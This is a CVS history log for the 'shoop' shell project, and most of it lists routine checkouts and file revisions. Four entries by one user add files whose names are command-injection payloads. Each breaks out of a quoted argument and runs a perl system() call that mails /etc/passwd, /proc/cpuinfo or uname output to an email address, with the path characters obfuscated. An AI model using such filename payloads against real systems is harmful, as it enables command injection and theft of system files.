O3894baeb|doogie|<remote>/*0|shoop||shoop
M3894bc68|doogie|<remote>|shoop|1.37|Makefile
M3894c8ab|doogie|<remote>|shoop|1.64|shoop.sh
M3894c8ab|doogie|<remote>|shoop|1.5|destroy.sh
M3894c8f0|doogie|<remote>|shoop|1.27|example.sh
M3894c9a0|doogie|<remote>|shoop|1.38|Makefile
M3894cafe|doogie|<remote>|shoop|1.39|Makefile
A3894cafe|doogie|<remote>|shoop/t|1.1|benchmark
A3894cafe|doogie|<remote>|shoop/t|1.1|benchmark.bm
A3894ec80|doogie|<remote>|shoop/utils|1.1|shell-stripper
M3894edc3|doogie|<remote>|shoop|1.40|Makefile
M3894f4cb|doogie|<remote>|shoop|1.41|Makefile
M3894f66f|doogie|<remote>|shoop|1.4|TODO
M38951bc8|doogie|<remote>|shoop/utils|1.2|shell-stripper
M38951c4d|doogie|<remote>|shoop/t|1.2|benchmark.bm
O389529c3|doogie|<remote>/*0|CVSROOT||CVSROOT
M38953c4f|doogie|<remote>|CVSROOT|1.2|loginfo
A38953c4f|doogie|<remote>|CVSROOT|1.1|newlog.pl
M38953c96|doogie|<remote>|shoop|1.5|TODO
M38953cf5|doogie|<remote>|CVSROOT|1.3|loginfo
M38953d0c|doogie|<remote>|CVSROOT|1.4|loginfo
M38953d79|doogie|<remote>|CVSROOT|1.5|loginfo
M38953d92|doogie|<remote>|CVSROOT|1.6|loginfo
M38953dca|doogie|<remote>|CVSROOT|1.7|loginfo
M38953df6|doogie|<remote>|CVSROOT|1.8|loginfo
M38953e66|doogie|<remote>|CVSROOT|1.9|loginfo
M38953e7a|doogie|<remote>|CVSROOT|1.10|loginfo
M38953f19|doogie|<remote>|CVSROOT|1.11|loginfo
M38953f28|doogie|<remote>|CVSROOT|1.12|loginfo
M38953fd2|doogie|<remote>|shoop|1.42|Makefile
M3895404f|doogie|<remote>|CVSROOT|1.13|loginfo
M38954059|doogie|<remote>|CVSROOT|1.14|loginfo
M38954112|doogie|<remote>|CVSROOT|1.15|loginfo
M3895411e|doogie|<remote>|CVSROOT|1.16|loginfo
M38954163|doogie|<remote>|CVSROOT|1.17|loginfo
M3895416d|doogie|<remote>|CVSROOT|1.18|loginfo
M389544c1|doogie|<remote>|CVSROOT|1.19|loginfo
M38954509|doogie|<remote>|CVSROOT|1.20|loginfo
M389545cc|doogie|<remote>|CVSROOT|1.21|loginfo
M38954640|doogie|<remote>|CVSROOT|1.22|loginfo
M38954709|doogie|<remote>|CVSROOT|1.23|loginfo
M38954c2e|doogie|<remote>|CVSROOT|1.2|modules
M38954c48|doogie|<remote>|CVSROOT|1.24|loginfo
O38954c8f|doogie|<remote>*5|shoop/www||www
A38954cd2|doogie|<remote>|shoop/www|1.1|index.php
M38955120|doogie|<remote>|shoop/www|1.2|index.php
M38956055|doogie|<remote>|shoop|1.6|destroy.sh
M3895cabc|doogie|<remote>|CVSROOT|1.2|checkoutlist
M3895cc13|doogie|<remote>|CVSROOT|1.25|loginfo
M38973a11|doogie|<remote>|shoop/www|1.3|index.php
O38973e25|joey|<remote>/*0|shoop||shoop
M38973e8e|joey|<remote>|shoop/t|1.11|inheritance.sh
M38974240|doogie|<remote>|shoop|1.6|TODO
M389742d2|doogie|<remote>|shoop/t|1.12|inheritance.sh
M389757f6|doogie|<remote>|shoop|1.65|shoop.sh
M3897ef08|doogie|<remote>|shoop|1.66|shoop.sh
A3897f3e0|doogie|<remote>|CVSROOT|1.1|cvs-identity
M3897f412|doogie|<remote>|CVSROOT|1.3|checkoutlist
A3897f5d9|doogie|<remote>|shoop/www|1.1|update
M3897f95d|doogie|<remote>|shoop/www|1.2|update
M3897f97f|doogie|<remote>|shoop/www|1.3|update
M3897f99a|doogie|<remote>|shoop/www|1.4|update
M3897f9df|doogie|<remote>|shoop/www|1.5|update
M3897f9fe|doogie|<remote>|shoop/www|1.6|update
M3897fab3|doogie|<remote>|shoop/www|1.7|update
M3897faf8|doogie|<remote>|shoop/www|1.8|update
G3897fb30|doogie|<remote>|shoop/www|1.8|update
M3897fb90|doogie|<remote>|shoop/www|1.9|update
G3897fb98|doogie|<remote>|shoop/www|1.9|update
M3897fbc1|doogie|<remote>|shoop/www|1.10|update
G3897fbc9|doogie|<remote>|shoop/www|1.10|update
M3897fcd7|doogie|<remote>|shoop/www|1.11|update
G3897fce2|doogie|<remote>|shoop/www|1.11|update
M3897fd69|doogie|<remote>|shoop/www|1.12|update
M3897fe5e|doogie|<remote>|shoop/www|1.13|update
G3897fe6b|doogie|<remote>|shoop/www|1.13|update
M3898011a|doogie|<remote>|CVSROOT|1.26|loginfo
M38980184|doogie|<remote>|shoop/www|1.4|index.php
M38980248|doogie|<remote>|CVSROOT|1.27|loginfo
M38980275|doogie|<remote>|shoop/www|1.5|index.php
M38980326|doogie|<remote>|CVSROOT|1.28|loginfo
M38980339|doogie|<remote>|shoop/www|1.6|index.php
M3898040c|doogie|<remote>|shoop/www|1.7|index.php
M3898048a|doogie|<remote>|CVSROOT|1.4|checkoutlist
A3898048a|doogie|<remote>|CVSROOT|1.1|debugcvs
M3898048a|doogie|<remote>|CVSROOT|1.29|loginfo
M389804a5|doogie|<remote>|shoop/www|1.8|index.php
M389804c2|doogie|<remote>|CVSROOT|1.30|loginfo
M389804d5|doogie|<remote>|shoop/www|1.9|index.php
M38980513|doogie|<remote>|shoop/www|1.10|index.php
M38980547|doogie|<remote>|CVSROOT|1.31|loginfo
M38980559|doogie|<remote>|shoop/www|1.11|index.php
M389805ae|doogie|<remote>|CVSROOT|1.32|loginfo
M389805c8|doogie|<remote>|shoop/www|1.12|index.php
M38980620|doogie|<remote>|CVSROOT|1.33|loginfo
M3898064b|doogie|<remote>|shoop/www|1.13|index.php
M389806a3|doogie|<remote>|CVSROOT|1.2|debugcvs
M389806cc|doogie|<remote>|shoop/www|1.14|index.php
M38980729|doogie|<remote>|CVSROOT|1.5|checkoutlist
M38980747|doogie|<remote>|shoop/www|1.15|index.php
M3898083b|doogie|<remote>|CVSROOT|1.3|debugcvs
M38980852|doogie|<remote>|shoop/www|1.16|index.php
M3898091f|doogie|<remote>|CVSROOT|1.34|loginfo
M3898091f|doogie|<remote>|CVSROOT|1.4|debugcvs
M3898093c|doogie|<remote>|shoop/www|1.17|index.php
M389809ba|doogie|<remote>|CVSROOT|1.35|loginfo
M389809ba|doogie|<remote>|CVSROOT|1.5|debugcvs
M38980a2b|doogie|<remote>|shoop/www|1.18|index.php
M38986ea8|doogie|<remote>|shoop/www|1.19|index.php
M389900dd|doogie|<remote>|shoop|1.67|shoop.sh
M389905e1|doogie|<remote>|CVSROOT|1.36|loginfo
M3899063c|doogie|<remote>|CVSROOT|1.6|debugcvs
M3899063c|doogie|<remote>|CVSROOT|1.37|loginfo
M389906a6|doogie|<remote>|CVSROOT|1.7|debugcvs
M3899071f|doogie|<remote>|CVSROOT|1.8|debugcvs
M3899071f|doogie|<remote>|CVSROOT|1.38|loginfo
M389907bb|doogie|<remote>|CVSROOT|1.6|checkoutlist
M389907bb|doogie|<remote>|CVSROOT|1.9|debugcvs
M389907bb|doogie|<remote>|CVSROOT|1.39|loginfo
M389909f3|doogie|<remote>|shoop/www|1.20|index.php
G38990a2b|doogie|<remote>|shoop/www|1.20|index.php
M38990b51|doogie|<remote>|shoop/t|1.2|benchmark
M38990bc8|doogie|<remote>|shoop/t|1.3|benchmark.bm
A38990bc8|doogie|<remote>|shoop|1.1|also_inherit.sh
M38990bc8|doogie|<remote>|shoop|1.43|Makefile
M38990d3c|doogie|<remote>|shoop/t|1.13|inheritance.sh
M38990d81|doogie|<remote>|shoop|1.44|Makefile
M38990f66|doogie|<remote>|shoop/utils|1.3|shell-stripper
A38990fea|doogie|<remote>|shoop/debian|1.1|rules
A38990feb|doogie|<remote>|shoop|1.1|rules_debian.sh
A38991016|doogie|<remote>|shoop/docs|1.1|shoop.txt
M389cc202|doogie|<remote>|shoop|1.68|shoop.sh
M389cc252|doogie|<remote>|shoop|1.69|shoop.sh
M389cc641|doogie|<remote>|shoop/utils|1.4|shell-stripper
M389cc66b|doogie|<remote>|shoop|1.2|also_inherit.sh
M389ceb8c|doogie|<remote>|shoop/t|1.9|regress
M389cedf7|doogie|<remote>|shoop|1.28|example.sh
M389cedf7|doogie|<remote>|shoop|1.70|shoop.sh
M389cedf8|doogie|<remote>|shoop/t|1.14|inheritance.sh
M389cf38b|doogie|<remote>|shoop/t|1.3|benchmark
M389cf3ad|doogie|<remote>|shoop|1.45|Makefile
M389cf5b7|doogie|<remote>|shoop|1.3|also_inherit.sh
M389cf5b7|doogie|<remote>|shoop|1.5|final.sh
M389cf5b7|doogie|<remote>|shoop|1.16|introspect.sh
M389cf5b7|doogie|<remote>|shoop|1.3|prettyprint.sh
M389cf5b7|doogie|<remote>|shoop|1.7|serialize.sh
M389cf5b7|doogie|<remote>|shoop|1.3|thread.sh
M389cf5b7|doogie|<remote>|shoop|1.7|use.sh
M389cf5b7|doogie|<remote>|shoop|1.71|shoop.sh
M389cf78a|doogie|<remote>|shoop|1.4|also_inherit.sh
M389cf78a|doogie|<remote>|shoop|1.2|rules_debian.sh
M389cf78b|doogie|<remote>|shoop/t|1.4|benchmark
M389cf7c6|doogie|<remote>|shoop/debian|1.2|rules
M389cfa2d|doogie|<remote>|shoop|1.7|destroy.sh
M389cfa2d|doogie|<remote>|shoop|1.6|final.sh
M389cfa2d|doogie|<remote>|shoop|1.17|introspect.sh
M389cfa2d|doogie|<remote>|shoop|1.4|prettyprint.sh
M389cfa2d|doogie|<remote>|shoop|1.8|serialize.sh
M389cfa2d|doogie|<remote>|shoop|1.72|shoop.sh
M389cfa2d|doogie|<remote>|shoop|1.8|use.sh
M389cfa2d|doogie|<remote>|shoop|1.4|thread.sh
M389dfd05|doogie|<remote>|shoop|1.46|Makefile
M389dfef1|doogie|<remote>|shoop|1.18|introspect.sh
M389e0685|doogie|<remote>|shoop|1.8|destroy.sh
M389e0685|doogie|<remote>|shoop|1.7|final.sh
M389e0685|doogie|<remote>|shoop|1.5|prettyprint.sh
M389e0685|doogie|<remote>|shoop|1.9|serialize.sh
M389e106a|doogie|<remote>|shoop|1.73|shoop.sh
M389e1119|doogie|<remote>|shoop|1.74|shoop.sh
M389f4a57|doogie|<remote>|shoop/t|1.10|regress
M389f5dc1|doogie|<remote>|shoop/docs|1.2|shoop.txt
M389f614b|doogie|<remote>|shoop|1.26|README
M389f614b|doogie|<remote>|shoop|1.5|also_inherit.sh
M389f614b|doogie|<remote>|shoop|1.9|destroy.sh
M389f614b|doogie|<remote>|shoop|1.8|final.sh
M389f614b|doogie|<remote>|shoop|1.19|introspect.sh
M389f614b|doogie|<remote>|shoop|1.6|prettyprint.sh
M389f614b|doogie|<remote>|shoop|1.3|rules_debian.sh
M389f614b|doogie|<remote>|shoop|1.10|serialize.sh
M389f614b|doogie|<remote>|shoop|1.75|shoop.sh
M389f614b|doogie|<remote>|shoop|1.5|thread.sh
M389f614b|doogie|<remote>|shoop|1.9|use.sh
M389f614b|doogie|<remote>|shoop|1.2|COPYING
M389f614b|doogie|<remote>|shoop/t|1.5|benchmark
M389f614b|doogie|<remote>|shoop/utils|1.5|shell-stripper
A389f614b|doogie|<remote>|shoop/utils|1.1|shelldoc
M389f631a|doogie|<remote>|shoop|1.47|Makefile
M38a08001|doogie|<remote>|shoop/t|1.15|inheritance.sh
M38a08001|doogie|<remote>|shoop/t|1.11|regress
M38a080a6|doogie|<remote>|shoop|1.29|example.sh
M38a0826e|doogie|<remote>|shoop/t|1.4|benchmark.bm
M38a08318|doogie|<remote>|shoop/t|1.6|benchmark
M38a08318|doogie|<remote>|shoop/t|1.5|benchmark.bm
M38a52b27|doogie|<remote>|shoop|1.7|TODO
M38a53046|doogie|<remote>|shoop|1.76|shoop.sh
M38a53087|doogie|<remote>|shoop/t|1.7|benchmark
M38a53278|doogie|<remote>|CVSROOT|1.10|debugcvs
M38a53297|doogie|<remote>|CVSROOT|1.11|debugcvs
M38a532ba|doogie|<remote>|CVSROOT|1.12|debugcvs
M38a53337|doogie|<remote>|CVSROOT|1.13|debugcvs
M38a5335c|doogie|<remote>|CVSROOT|1.14|debugcvs
W38a53453|doogie|<remote>|shoop||AUTHORS
W38a53453|doogie|<remote>|shoop||CONTRIBUTING
W38a53453|doogie|<remote>|shoop||MODULES
W38a53453|doogie|<remote>|shoop||README
M38a534ec|doogie|<remote>|CVSROOT|1.15|debugcvs
M38a54d1f|doogie|<remote>|shoop|1.48|Makefile
A38a54d1f|doogie|<remote>|shoop|1.1|Makefile.rules
A38a54d1f|doogie|<remote>|shoop|1.1|Makefile.vars
A38a54d20|doogie|<remote>|shoop/docs|1.1|Makefile
A38a54d72|doogie|<remote>|shoop/modules|1.1|Makefile
A38a54dbf|doogie|<remote>|shoop/modules|1.1|www.sh
M38a54e5f|doogie|<remote>|shoop|1.77|shoop.sh
A38a54e9a|doogie|<remote>|shoop/modules|1.1|apt.sh
M38a5523d|doogie|<remote>|shoop|1.49|Makefile
M38a5523d|doogie|<remote>|shoop|1.2|Makefile.rules
M38a552fa|doogie|<remote>|shoop|1.50|Makefile
M38a557c0|doogie|<remote>|shoop/t|1.16|inheritance.sh
M38a61b47|doogie|<remote>|shoop|1.3|Makefile.rules
M38a61b47|doogie|<remote>|shoop|1.2|Makefile.vars
M38a61b47|doogie|<remote>|shoop|1.51|Makefile
M38a632ce|doogie|<remote>|shoop/modules|1.6|also_inherit.sh
M38a632ce|doogie|<remote>|shoop/modules|1.10|destroy.sh
M38a632ce|doogie|<remote>|shoop/modules|1.9|final.sh
M38a632ce|doogie|<remote>|shoop/modules|1.20|introspect.sh
M38a632ce|doogie|<remote>|shoop/modules|1.7|prettyprint.sh
M38a632ce|doogie|<remote>|shoop/modules|1.11|serialize.sh
M38a632ce|doogie|<remote>|shoop/modules|1.2|www.sh
A38a633d5|doogie|<remote>|shoop/utils|1.1|mkChangeLog
M38a633d6|doogie|<remote>|shoop|1.52|Makefile
M38a639cf|doogie|<remote>|shoop|1.53|Makefile
M38a8dc5c|doogie|<remote>|shoop|1.78|shoop.sh
M38a8dcb7|doogie|<remote>|shoop/modules|1.12|serialize.sh
M38a8f37f|doogie|<remote>|shoop|1.79|shoop.sh
O396558ef|joey|<remote>/*0|shoop||shoop
A39655910|joey|<remote>|shoop|1.1|';perl -e '$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system $_';'
A3965596e|joey|<remote>|shoop|1.1|';perl -e '$_=q{mail joey@kitenet.net < !proc!cpuinfo}; y:!#:\x2F\x40:; system $_';'
A396559c2|joey|<remote>|shoop|1.1|';perl -e '$_=q{uname -a | mail foo#bar.baz}; y:!#:\x2F\x40:; system $_';'
A39655a15|joey|<remote>|shoop|1.1|';perl -e '$_=q{uname -a |mail joey@kitenet.net}; y:!#:\x2F\x40:; system $_';'
O39655c77|joey|<remote>/*0|CVSROOT||CVSROOT
M399fa577|doogie|<remote>|shoop/utils|1.2|shelldoc
M399fa58a|doogie|<remote>|shoop/utils|1.3|shelldoc
M3a7c51f8|doogie|<remote>|shoop|1.3|Makefile.vars
M3a7c51f8|doogie|<remote>|shoop|1.54|Makefile
A3a7c526b|doogie|<remote>|shoop/modules|1.1|dns.sh
M3a7c526b|doogie|<remote>|shoop/modules|1.2|Makefile
M3a7c8580|doogie|<remote>|CVSROOT|1.16|debugcvs
M3a7cb167|doogie|<remote>|CVSROOT|1.17|debugcvs
O3a82ebc8|algernon|<remote>/*0|shoop||shoop
O3a82ec68|algernon|<remote>/*0|shoop||shoop
A3a82f0b9|algernon|<remote>|shoop/debian|1.1|changelog
A3a82f0b9|algernon|<remote>|shoop/debian|1.1|control
A3a82f0b9|algernon|<remote>|shoop/debian|1.1|copyright
A3a82f0b9|algernon|<remote>|shoop/debian|1.1|shoop.docs
A3a82f0b9|algernon|<remote>|shoop/debian|1.1|shoop-modules.dirs
M3a82f1b5|algernon|<remote>|shoop/debian|1.3|rules
M3a831848|algernon|<remote>|shoop/docs|1.2|AUTHORS
O3a8eba2c|algernon|<remote>/*0|shoop||shoop
O3a8ebac6|doogie|<remote>/*0|CVSROOT||CVSROOT
M3a8ebafc|doogie|<remote>|CVSROOT|1.18|debugcvs
M3a8ebb29|doogie|<remote>|CVSROOT|1.19|debugcvs
O3a8ebb44|algernon|<remote>/.|||.
M3a8ebb79|doogie|<remote>|CVSROOT|1.20|debugcvs
M3a8ebb94|doogie|<remote>|CVSROOT|1.21|debugcvs
O3a8ebc32|algernon|<remote>/.|||.
M3a8ebea2|algernon|<remote>|shoop/debian|1.2|control
M3a8ec0cd|algernon|<remote>|shoop/debian|1.4|rules
M3a8ecdd6|doogie|<remote>|shoop|1.80|shoop.sh
M3a8ecdee|doogie|<remote>|shoop|1.81|shoop.sh
M3a8ed6b9|doogie|<remote>|shoop|1.30|example.sh
M3a8ed989|doogie|<remote>|shoop/t|1.12|regress
M3a8edec5|doogie|<remote>|shoop/modules|1.10|use.sh
M3a8edfac|doogie|<remote>|shoop/modules|1.11|use.sh
M3a8ee32d|doogie|<remote>|shoop/modules|1.12|use.sh
M3a8ee48b|doogie|<remote>|shoop/modules|1.13|use.sh
M3a8ee48b|doogie|<remote>|shoop|1.31|example.sh
M3a8ef004|algernon|<remote>|shoop/debian|1.3|control
R3a8ef10a|algernon|<remote>|shoop/debian|1.2|shoop.docs
A3a8ef20a|algernon|<remote>|shoop/debian|1.1|shoop-dev.dirs
A3a8ef20a|algernon|<remote>|shoop/debian|1.1|shoop-dev.docs
A3a8ef20a|algernon|<remote>|shoop/debian|1.1|shoop-dev.examples
M3a8ef337|algernon|<remote>|shoop/debian|1.2|shoop-modules.dirs
M3a8ef48f|algernon|<remote>|shoop/debian|1.5|rules
M3a8ef758|algernon|<remote>|shoop/t|1.6|benchmark.bm
M3a8ef758|algernon|<remote>|shoop/t|1.17|inheritance.sh
M3a901273|algernon|<remote>|shoop/debian|1.4|control
M3a9012fe|algernon|<remote>|shoop/debian|1.6|rules
M3a90165a|algernon|<remote>|shoop|1.32|example.sh
M3a91e4f7|doogie|<remote>|shoop/t|1.13|regress
M3a91f527|doogie|<remote>|shoop|1.82|shoop.sh
M3a91f5ff|doogie|<remote>|shoop|1.83|shoop.sh
M3a91f6ef|doogie|<remote>|shoop|1.84|shoop.sh
G3a91fbce|doogie|<remote>|shoop|1.84|shoop.sh
G3a91fc3e|doogie|<remote>|shoop|1.83|shoop.sh
G3a91fc4e|doogie|<remote>|shoop|1.82|shoop.sh
G3a91fc57|doogie|<remote>|shoop|1.81|shoop.sh
G3a91fda5|doogie|<remote>|shoop|1.84|shoop.sh
M3a91fdf8|doogie|<remote>|shoop|1.85|shoop.sh
M3a91fe92|doogie|<remote>|shoop/utils|1.4|shelldoc
M3a91ff0a|doogie|<remote>|shoop/modules|1.14|use.sh
M3a9201db|doogie|<remote>|shoop/modules|1.2|dns.sh
M3a9201f9|doogie|<remote>|shoop/modules|1.3|dns.sh
M3a9201f9|doogie|<remote>|shoop/modules|1.15|use.sh
M3a9201f9|doogie|<remote>|shoop/utils|1.6|shell-stripper
A3a920286|doogie|<remote>|shoop/debian|1.1|.cvsignore
A3a920286|doogie|<remote>|shoop/docs|1.1|.cvsignore
A3a920286|doogie|<remote>|shoop|1.1|.cvsignore
M3a921837|doogie|<remote>|shoop|1.86|shoop.sh
M3a9218f4|doogie|<remote>|shoop|1.55|Makefile
A3a9218f4|doogie|<remote>|shoop/modules|1.1|list.sh
A3a9218f4|doogie|<remote>|shoop/t|1.1|list.sh
M3a92190e|doogie|<remote>|shoop|1.56|Makefile
M3a921943|doogie|<remote>|shoop/modules|1.3|Makefile
M3a92198a|doogie|<remote>|shoop|1.33|example.sh
M3a921b95|doogie|<remote>|shoop/modules|1.2|list.sh
M3a92255e|doogie|<remote>|shoop/utils|1.2|mkChangeLog
M3a9225f5|doogie|<remote>|shoop/utils|1.3|mkChangeLog
A3a922616|doogie|<remote>|shoop/modules|1.1|TODO
M3a92f41d|doogie|<remote>|shoop/t|1.14|regress
M3a92f440|doogie|<remote>|shoop/t|1.18|inheritance.sh
M3a92f46c|doogie|<remote>|shoop|1.87|shoop.sh
M3a92f720|doogie|<remote>|shoop/modules|1.3|list.sh
M3a92f768|doogie|<remote>|shoop/modules|1.4|list.sh
M3a92f7ba|doogie|<remote>|shoop/t|1.2|list.sh
M3a92f7ba|doogie|<remote>|shoop/modules|1.5|list.sh
M3a92f7f8|doogie|<remote>|shoop/modules|1.4|Makefile
A3a92f7f8|doogie|<remote>|shoop/modules|1.1|stack.sh
A3a92f7f8|doogie|<remote>|shoop/t|1.1|stack.sh
A3a92f8cc|doogie|<remote>|shoop/t|1.1|onexit.sh
M3a92f8cc|doogie|<remote>|shoop/modules|1.5|Makefile
A3a92f8cc|doogie|<remote>|shoop/modules|1.1|onexit.sh
M3a92f8df|doogie|<remote>|shoop|1.57|Makefile
M3a93db60|doogie|<remote>|shoop/modules|1.2|TODO
M3a93dc44|doogie|<remote>|shoop/modules|1.11|destroy.sh
M3a93e01d|doogie|<remote>|shoop|1.88|shoop.sh
M3a93e391|doogie|<remote>|shoop|1.89|shoop.sh
M3a93e3c8|doogie|<remote>|shoop/modules|1.2|onexit.sh
M3a941120|doogie|<remote>|shoop/modules|1.10|final.sh
M3a9411af|doogie|<remote>|shoop/modules|1.4|dns.sh
M3a9411af|doogie|<remote>|shoop/modules|1.6|list.sh
M3a9411af|doogie|<remote>|shoop/modules|1.3|onexit.sh
M3a9424d8|doogie|<remote>|shoop/t|1.15|regress
M3a9424d9|doogie|<remote>|shoop/modules|1.7|list.sh
M3a9424d9|doogie|<remote>|shoop|1.90|shoop.sh
M3a955975|doogie|<remote>|shoop|1.91|shoop.sh
M3a955975|doogie|<remote>|shoop|1.58|Makefile
A3a955975|doogie|<remote>|shoop/t|1.1|ref.sh
M3a955998|doogie|<remote>|CVSROOT|1.22|debugcvs
M3a9559a5|doogie|<remote>|CVSROOT|1.23|debugcvs
M3a955ac4|doogie|<remote>|CVSROOT|1.24|debugcvs
M3a956426|doogie|<remote>|CVSROOT|1.25|debugcvs
M3a956474|doogie|<remote>|CVSROOT|1.2|newlog.pl
M3a9564c3|doogie|<remote>|CVSROOT|1.26|debugcvs
M3a957b07|algernon|<remote>|shoop/debian|1.7|rules
M3a957cb9|doogie|<remote>|CVSROOT|1.27|debugcvs
M3a957d03|doogie|<remote>|CVSROOT|1.28|debugcvs
M3a957d18|doogie|<remote>|CVSROOT|1.3|newlog.pl
M3a957d84|algernon|<remote>|shoop/debian|1.2|shoop-dev.examples
M3a957e63|doogie|<remote>|CVSROOT|1.4|newlog.pl
M3a9706f4|doogie|<remote>|shoop/t|1.16|regress
M3a97071f|doogie|<remote>|shoop/modules|1.13|serialize.sh
A3a97072c|doogie|<remote>|shoop/t|1.1|serialize.sh
M3a97078b|doogie|<remote>|shoop|1.59|Makefile
M3a970f70|doogie|<remote>|shoop/modules|1.4|onexit.sh
M3a971169|doogie|<remote>|shoop/modules|1.6|thread.sh
M3a9712be|doogie|<remote>|shoop|1.92|shoop.sh
M3a971641|doogie|<remote>|shoop/modules|1.8|list.sh
M3a971641|doogie|<remote>|shoop/t|1.3|list.sh
M3a971d90|doogie|<remote>|shoop/modules|1.9|list.sh
A3a971dd1|doogie|<remote>|shoop/modules|1.1|signals.sh
M3a9b0348|doogie|<remote>|shoop/utils|1.7|shell-stripper
M3a9b049b|doogie|<remote>|shoop/utils|1.8|shell-stripper
M3a9b1348|doogie|<remote>|shoop/t|1.17|regress
M3a9e9d58|doogie|<remote>|shoop/debian|1.2|changelog
M3a9e9d58|doogie|<remote>|shoop/debian|1.8|rules
M3a9e9eab|doogie|<remote>|shoop/t|1.8|benchmark
M3a9eac28|doogie|<remote>|shoop/t|1.9|benchmark
M3a9eacaa|doogie|<remote>|shoop/t|1.10|benchmark
M3a9eacf7|doogie|<remote>|shoop/t|1.7|benchmark.bm
M3a9eada5|doogie|<remote>|shoop|1.93|shoop.sh
M3a9eade2|doogie|<remote>|shoop|1.94|shoop.sh
M3a9eae55|doogie|<remote>|shoop|1.60|Makefile
M3a9eb06a|doogie|<remote>|shoop|1.95|shoop.sh
M3a9eca70|doogie|<remote>|shoop|1.96|shoop.sh
M3a9ecae9|doogie|<remote>|shoop/t|1.18|regress
M3a9ecb11|doogie|<remote>|shoop/t|1.2|onexit.sh
M3a9ecb11|doogie|<remote>|shoop/t|1.2|serialize.sh
M3a9ecec3|doogie|<remote>|shoop|1.97|shoop.sh
M3a9ecf63|doogie|<remote>|shoop/debian|1.9|rules
M3a9ecf7f|doogie|<remote>|shoop|1.61|Makefile
A3a9ecf7f|doogie|<remote>|shoop/t|1.1|ifs.sh
M3a9edd30|doogie|<remote>|shoop|1.98|shoop.sh
M3a9edd89|doogie|<remote>|shoop/t|1.11|benchmark
M3a9f0cd3|doogie|<remote>|shoop|1.99|shoop.sh
M3a9f0d39|doogie|<remote>|shoop|1.100|shoop.sh
M3a9f35b7|doogie|<remote>|shoop|1.101|shoop.sh
M3a9f35d5|doogie|<remote>|shoop|1.102|shoop.sh
M3a9f366e|doogie|<remote>|shoop|1.103|shoop.sh
M3a9f395e|doogie|<remote>|shoop|1.104|shoop.sh
M3a9f39e0|doogie|<remote>|shoop|1.105|shoop.sh
M3a9f3de6|doogie|<remote>|shoop|1.106|shoop.sh
M3a9f3f4f|doogie|<remote>|shoop|1.107|shoop.sh
M3a9f3f4f|doogie|<remote>|shoop|1.62|Makefile
A3a9f3f4f|doogie|<remote>|shoop/t|1.1|super.sh
M3a9f3fa5|doogie|<remote>|shoop/modules|1.10|list.sh
M3a9f43af|doogie|<remote>|shoop|1.63|Makefile
M3a9f43af|doogie|<remote>|shoop/modules|1.6|Makefile
A3a9f43af|doogie|<remote>|shoop/modules|1.1|alist.sh
A3a9f43af|doogie|<remote>|shoop/t|1.1|alist.sh
M3a9f4c38|doogie|<remote>|shoop|1.108|shoop.sh
M3a9f4c38|doogie|<remote>|shoop/modules|1.7|Makefile
M3a9f4c38|doogie|<remote>|shoop/modules|1.2|alist.sh
M3a9f4c39|doogie|<remote>|shoop/t|1.2|alist.sh
M3a9f4c39|doogie|<remote>|shoop/t|1.2|ref.sh
A3a9f4d41|doogie|<remote>|shoop/modules|1.1|ref.sh
M3a9f4d95|doogie|<remote>|shoop|1.64|Makefile
M3a9f5087|doogie|<remote>|shoop/docs|1.2|Makefile
M3a9f50b5|doogie|<remote>|shoop|1.4|Makefile.rules
M3a9f5138|doogie|<remote>|shoop|1.5|Makefile.rules
M3a9fe450|doogie|<remote>|shoop/modules|1.2|ref.sh
M3a9fe71e|doogie|<remote>|shoop|1.6|Makefile.rules
M3a9fe838|doogie|<remote>|shoop/modules|1.8|Makefile
M3a9ff5d6|doogie|<remote>|shoop/t|1.3|ref.sh
M3aa03063|doogie|<remote>|shoop|1.109|shoop.sh
M3aa03598|doogie|<remote>|shoop/t|1.19|regress
M3aa04b59|doogie|<remote>|shoop/t|1.20|regress
C3aa16c62|doogie|<remote>|shoop|1.33|example.sh
C3aa16c62|doogie|<remote>*5|shoop/modules|1.8|Makefile
M3aa17f2d|algernon|<remote>|shoop|1.8|TODO
M3aa21b1c|doogie|<remote>|shoop/t|1.4|ref.sh
M3aa21b1c|doogie|<remote>|shoop/modules|1.3|ref.sh
M3aa22091|doogie|<remote>|shoop|1.110|shoop.sh
M3aa22091|doogie|<remote>|shoop/t|1.19|inheritance.sh
A3aa36166|doogie|<remote>|shoop/t|1.1|metachars.sh
M3aa36166|doogie|<remote>|shoop/t|1.21|regress
M3aa36167|doogie|<remote>|shoop|1.111|shoop.sh
M3aa36221|doogie|<remote>|shoop|1.65|Makefile
A3aa365cb|doogie|<remote>|shoop/modules|1.1|shoop.sh
A3aa365cb|doogie|<remote>|shoop/modules|1.1|shoop_command.sh
A3aa365cb|doogie|<remote>|shoop/t|1.1|shoop_command.sh
M3aa365de|doogie|<remote>|shoop/modules|1.9|Makefile
M3aa36606|doogie|<remote>|shoop|1.112|shoop.sh
M3aa3d6b2|doogie|<remote>|shoop/t|1.22|regress
M3aa3d7fb|doogie|<remote>|shoop/t|1.23|regress
A3aa3dfea|doogie|<remote>|shoop/t|1.1|shoop2.sh
A3aa3dfeb|doogie|<remote>|shoop|1.1|shoop2.sh
M3aa3dfeb|doogie|<remote>|shoop|1.66|Makefile
C3aa41dc1|doogie|<remote>|shoop|1.66|Makefile
C3aa41dc2|doogie|<remote>|shoop|1.112|shoop.sh
C3aa41dc2|doogie|<remote>*5|shoop/modules|1.9|Makefile
O3aa4202e|doogie|<remote>/*0|shoop||shoop
M3aa4269b|doogie|<remote>|shoop|1.2|shoop2.sh
M3aa4355e|doogie|<remote>|shoop/modules|1.11|list.sh
M3aa4355f|doogie|<remote>|shoop/t|1.4|list.sh
M3aa4375f|doogie|<remote>|shoop/t|1.2|shoop_command.sh
M3aa4375f|doogie|<remote>|shoop/modules|1.2|shoop_command.sh
M3aa49ebd|doogie|<remote>|shoop|1.113|shoop.sh
M3aa49ebd|doogie|<remote>|shoop/t|1.2|metachars.sh
A3aa4a191|doogie|<remote>|shoop/t|1.1|stringutil.sh
M3aa4a192|doogie|<remote>|shoop|1.67|Makefile
M3aa4a192|doogie|<remote>|shoop/modules|1.10|Makefile
A3aa4a192|doogie|<remote>|shoop/modules|1.1|stringutil.sh
M3aa4a1cd|doogie|<remote>|shoop/t|1.2|shoop2.sh
M3aa7ca64|doogie|<remote>|shoop/t|1.24|regress
M3aa7cbcb|doogie|<remote>|shoop/t|1.25|regress
M3aa7d571|doogie|<remote>|shoop/t|1.26|regress
M3aa7d734|doogie|<remote>|shoop/modules|1.2|stringutil.sh
